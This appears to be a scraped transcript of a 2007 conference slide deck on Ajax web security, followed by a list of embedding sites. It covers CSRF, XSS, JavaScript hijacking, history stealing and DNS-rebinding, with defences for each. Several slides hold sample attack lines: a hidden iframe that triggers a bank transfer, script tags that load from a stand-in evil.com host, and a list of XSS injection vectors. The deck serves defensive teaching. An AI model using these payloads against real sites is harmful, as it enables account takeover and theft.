Ajax Security

CSRF (Cross Site Request Forgery) You can still abuse someone else’s cookies and headers even if you can’t read them

Recap: Cross-Domain Rules www.bank.com www.evil.com c = document.cookie; c = document.cookie; alert(c); alert(c); /* /* Shows cookies from Shows cookies from www.bank.com www.evil.com */ */ Copyright SitePen, Inc. 2008. All Rights Reserved

Abusing a Cookie without reading it www.bank.com www.evil.com Welcome to Bank.com Welcome to Evil.com We offer the best rates anywhere in We’ve got lots of warez to give away the world, guaranteed. Give us your for freee. Download our stuffs and money and we will look after it in then come back and get more the same way we look after little stuffs. Videoz, Warez, Codez, Mp3s baby kittens. . <iframe width=0 height=0 src=quot;http://bank.com/transfer?amnt=all&dest=MrEvilquot;/> Copyright SitePen, Inc. 2008. All Rights Reserved

CSRF JavaScript is not always required to exploit a CSRF hole Often all you need is: • <iframe src=quot;dangerous_urlquot;> • or <img src=quot;dangerous_urlquot;/> • or <script src=quot;dangerous_urlquot;> You can’t use XHR because cross-domain rules prevent the request from being sent Copyright SitePen, Inc. 2008. All Rights Reserved

CSRF CSRF attacks are write-only (with one exception) Both GET and POST can be forged Referrer checking is not a complete ﬁx It’s not just cookies that get stolen: • HTTP-Auth headers • Active Directory Kerberos tokens Copyright SitePen, Inc. 2008. All Rights Reserved

CSRF - Protection Not 100% solution Force users to log off Check referrer headers (https only) Include authentication tokens The only complete in the body of EVERY request solution Copyright SitePen, Inc. 2008. All Rights Reserved

CSRF - Protection Security tokens in GET requests are not a great idea (bookmarks, caches, GET is idempotent etc) POST means forms with hidden ﬁelds • OWASP servlet ﬁlter http://www.owasp.org/index.php/CSRF_Guard Double-submit cookie pattern (Ajax requests only) • Read the cookie with Javascript and submit in the body Copyright SitePen, Inc. 2008. All Rights Reserved

Login CSRF (Tricking someone into thinking they are you) CSRF turned inside out

Login CSRF If I can make your browser do things behind your back, how about logging you out of some service and back in as me. What are the possibilities when you think that you are you, but you’re not; you’re me? Copyright SitePen, Inc. 2008. All Rights Reserved

Login CSRF - Attacks What can I do? • See what you search for • See what books you want to buy • Read emails that you send • Steal credit card details through PayPal • etc Copyright SitePen, Inc. 2008. All Rights Reserved

Login CSRF - Defense If submitting over https: use Referrer checking • Do not assume no referrer is safe Use authentication tokens in your login form Watch out for session ﬁxation attacks • Invalidate the server session on login and re-create it Copyright SitePen, Inc. 2008. All Rights Reserved

JavaScript Hijacking (or how your GMail contacts were at risk) Sucking data out of Objects before they’re created

JavaScript Hijacking “CSRF is write-only with one known exception” Using <script> automatically evaluates the returned script So if you can just ﬁnd a way to intercept scripts as they are evaluated ... Copyright SitePen, Inc. 2008. All Rights Reserved

JavaScript Hijacking When you serve JavaScript from a website it could be evaluated in a hostile environment Protect secrets in JavaScript in the same way that you would protect them elsewhere Copyright SitePen, Inc. 2008. All Rights Reserved

JavaScript Hijacking Sometimes people wish to have a double layer of security to prevent evaluation: /*<JSON_HERE>*/ (Don’t do this) while(true); <JSON_HERE> (Google) throw new Error(quot;quot;); <JSON_HERE> (DWR) {}&& <JSON_HERE> Copyright SitePen, Inc. 2008. All Rights Reserved

XSS (Cross Site Scripting) Abusing someone’s trust in your typing

XSS 2 types: • Reﬂected: Script embedded in the request is ‘reﬂected’ in the response • Stored: Attacker’s input is stored and played back in later page views Copyright SitePen, Inc. 2008. All Rights Reserved

XSS Scenario: You let the user enter their name Someone is going to enter their name like this: Joe<script src=quot;http://evil.com/danger.jsquot;> Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe Generally HTML is not a valid input, but sometimes it is: • Blogs, MySpace, Wikis, RSS readers, etc Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Places that scripts get eval()ed 1. <table background=quot;javascript:danger()quot;> 14.<body background=quot;javascript:danger()quot;> 2. <input type='image' src='javascript:danger()'/> 15.<div onscroll='danger()'> 3. <object type=quot;text/x-scriptletquot; 16.<div onmouseenter='danger()'> data=quot;evil.com/danger.jsquot;> 17.<style> 4. <img src='javascript:danger()'/> @import evil.com/danger.js</style> 5. <frameset> 18.<style>BODY{-moz-binding:url( <frame src=quot;javascript:danger()quot;> quot;http://evil.com/danger.js#xssquot; )}</style> 6. <link rel=quot;stylesheetquot; href=quot;javascript:danger()quot;/> 19.<xss style=quot;behavior:url(danger.htc);quot;> 7. <base href=quot;javascript:danger()quot;> 20.<div style=quot;background-image: 8. <meta http-equiv=quot;refreshquot; url(javascript:danger())quot;> content=quot;0;url=javascript:danger()quot;> 21.<div style=quot;width: 9. <p style='background-image: expression(danger());quot;> url(quot;javascript:danger()quot;)'); 22.<xss style=quot;xss:expression(danger())quot;> 10.<a href='javascript:danger()'> 11.<tr background=quot;javascript:danger()quot;> Many more 12.<body onload='danger()'> http://ha.ckers.org/xss.html 13.<div onmouseover='danger()'> Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.htmlquot; link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.htmlquot;>link makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href=quot;a.html >link</a> makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: (depending on some encoding tricks) ¼a href=quot;a.htmlquot;¾link¼/a¾ makes perfect sense to a browser. Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Making User Input Safe And we haven’t got into: • Flash (ActionScript ~= JavaScript) • SVG (can embed JavaScript) • XML Data Islands (IE only) • HTML+TIME You can use both <object> and <embed> for many of these Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Protection (HTML is Illegal) 1. Filter inputs by white-listing input characters • Remember to ﬁlter header names and values 2. Filter outputs for the destination environment For HTML: < < > > ' ' quot; " & & For JavaScript Strings (but see later): ' ' quot; quot; LF n CR r * uXXXX Other environments have other special chars Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Protection (well-formed HTML is legal) 1. Filter inputs as before 2. Validate as HTML and throw away if it fails 3. Swap characters for entities (as before) 4. Swap back whitelist of allowed tags. e.g.: • <strong> <strong> 5. Take extra care over attributes: • &lta href="([^&]*)"/> <a href=quot;$1quot;/> 6. Take great care over regular expressions Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Protection (malformed HTML is legal) 1. Find another way to do it / Swap jobs / Find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document • Remember to recursively check encodings 3. Create a tree walker that removes all non approved elements and attributes Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Injection Points Places you can protect: • Plain content <div>$</div> • Some attribute values <input name=x value=quot;$quot;> (but take care) • Javascript string values: <script>str = quot;$quot;;</script> (but take care) Anything else is likely to be unsafe Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Injection Points Places you can’t easily protect: • <script>$</script> • <div $> • <div style=quot;$quot;>... • <div background=quot;$quot;> • <img src=quot;$quot;> • etc If users can affect CSS values, hrefs, srcs or plain JavaScript then you are likely to have an XSS hole Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Comment Power-up Commonly reflected attacks have length restrictions How to create space for an injection attack • Use ‘<script>/*’ in an restricted unprotected field and ‘*/’ in a later unrestricted protected field Copyright SitePen, Inc. 2008. All Rights Reserved

XSS - Summary For data input: • Restrict allowed characters for destination type For data output: • Escaped for the destination environment • Ensure encoding is speciﬁed (e.g. UTF-8) Allow inject only into known safe points Never assume that a hole is too small to jump through Copyright SitePen, Inc. 2008. All Rights Reserved

History Stealing I know where you’ve been, parts 1, 2, 3

History Stealing - Part 1 Mr. Evil wants to know if you visit bank.com He creates a page with a link and uses a script to read the CSS link color: • purple: customer • blue: not a customer Copyright SitePen, Inc. 2008. All Rights Reserved

History Stealing - Part 2 2 methods of detecting link color: • Easy - use JavaScript to read CSS properties • When JS is turned off - use CSS to ping the server Copyright SitePen, Inc. 2008. All Rights Reserved

History Stealing - Part 2 Point a script tag at a protected HTML resource, detect differing replies by differing error messages <script src=quot;http://mail.google.com/mailquot;> http://ha.ckers.org/weird/javascript-website-login-checker.html Copyright SitePen, Inc. 2008. All Rights Reserved

History Stealing - Part 3 A page can quickly check thousands of sites and ﬁnd where you bank and store your email A page can follow your clicks around the net: • Check for common set of URLs • Page reports hits to server • Server reads hit pages, greps out links sends links back • Page checks and follows a click-stream Copyright SitePen, Inc. 2008. All Rights Reserved

Combination Attacks Small holes don’t add up, they multiply up

Web Worms If your site that isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts XHR/Flash/Quicktime can be used as a vector Web worms grow much faster than email worms So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf Copyright SitePen, Inc. 2008. All Rights Reserved

Intranet Hacking History stealing to enumerate hosts inside the firewall Anti-DNS pinning to read HTML from inside Many routers / firewalls / etc have default passwords, which an attacker can exploit Use CSRF to alter router / firewall settings http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf Copyright SitePen, Inc. 2008. All Rights Reserved

Clickjacking When the page you are looking at is not the page you think you are looking at

ADP = Anti DNS Pinning Moving intranet servers into your domain

Anti-DNS Pinning About ‘Pinning’: Browsers ‘pin’ addresses to stop short timeouts DNS round-robin forces re-query of DNS if website appears to be down So websites can get around pins by ﬁrewalling themselves thus appearing to be down Copyright SitePen, Inc. 2008. All Rights Reserved

Anti-DNS Pinning It’s not great for the Internet: The browser thinks the domain is evil.com, so cookies for innocent.com are not sent: Cookie protected resources are safe (for now) But it’s great for Intranet hacking No cookies needed to read from 192.168.0.1 or 127.0.0.1 Copyright SitePen, Inc. 2008. All Rights Reserved

Web 2.0 Hacking Everything has a down side

Web 2.0 Hacking Building blocks: • Google Alerts: Search to EMail • Mailinator: EMail to RSS • Ponyﬁsh: Web to RSS via scraping • Storage: DabbleDB, Zoho • Yahoo Pipes: RSS remixing • L8R: Cron for EMail • Google Mashup Editor: RSS to REST API • Dapper, OpenKappow Copyright SitePen, Inc. 2008. All Rights Reserved

Dropping SSL after login is dangerous Being able to snoop on someone else’s cookie is virtually the same as being able to snoop on their password Some services (e.g. Google) default to http after login (bad), but allow you to use https for the whole session: • https://mail.google.com/mail/ • https://www.google.com/calendar/ • etc. Copyright SitePen, Inc. 2008. All Rights Reserved

Useful Tools Firefox: • NoScript - Accept scripts only from sites you trust • AltCookies - Accept cookies only from sites you trust • EditCooikes - Alter cookies for testing • Firebug - Dig deeply into HTTP/JavaSript/CSS and HTTP General: • Paros - Filtering Proxy (can be conﬁgured to be transparent) • Burp - Like Paros • Fiddler - Like Paros with integration into IE Copyright SitePen, Inc. 2008. All Rights Reserved

http://getahead.org	2255
http://ajaxian.com	1201
http://directwebremoting.org	931
http://5works.dev	505
http://laacz.lv	454
http://www.gnucitizen.org	436
http://www.ajaxian.com	361
http://www.logadmin.net	182
http://www.mimul.com	138
http://www.sitepen.com	137
http://hackathology.blogspot.com	96
http://www.netvibes.com	76
http://latha-math.com	73
http://php.by	67
http://security4all.blogspot.com	62
http://singe.za.net	60
http://www.burakdayioglu.net	57
http://www.blankus.net	44
http://breach-inv.blogspot.com	41
http://mimul.com	41
http://blog.code.ae	35
http://onwebdev.blogspot.com	27
http://www.slideshare.net	27
http://www.dmxzone.com	23
http://ajaxus.net	22
http://kislo8metal.blogspot.com	18
http://feeds.feedburner.com	16
http://min2liz.net	13
http://www.hanrss.com	12
http://s3.amazonaws.com	11
http://websecurity.com.ua	11
http://vie-eu-wik-01	10
http://www.nofluffjuststuff.com	10
http://blog.ecmas4.com	10
file://	10
http://localhost:16296	9
http://extjs.com	9
http://blog.security4all.be	8
http://www.ajax-blog.com	8
http://ecruu.tistory.com	8
http://www.php.by	8
http://www.pcsec.org	7
http://lowe.wangandmin.com	7
http://blankus.net	5
https://www.sitepen.com	5
http://rhio.tistory.com	5
http://www.flzone.com	5
http://www.queirozx.com.br	5
http://agileweb.org	5
http://swik.net	5
http://www.dnzone.com	5

Ajax Security

by Joe Walker on Oct 28, 2007

Accessibility

Categories

Tags

Upload Details

Usage Rights

100 Embeds 7,652

Statistics

Ajax Security — Presentation Transcript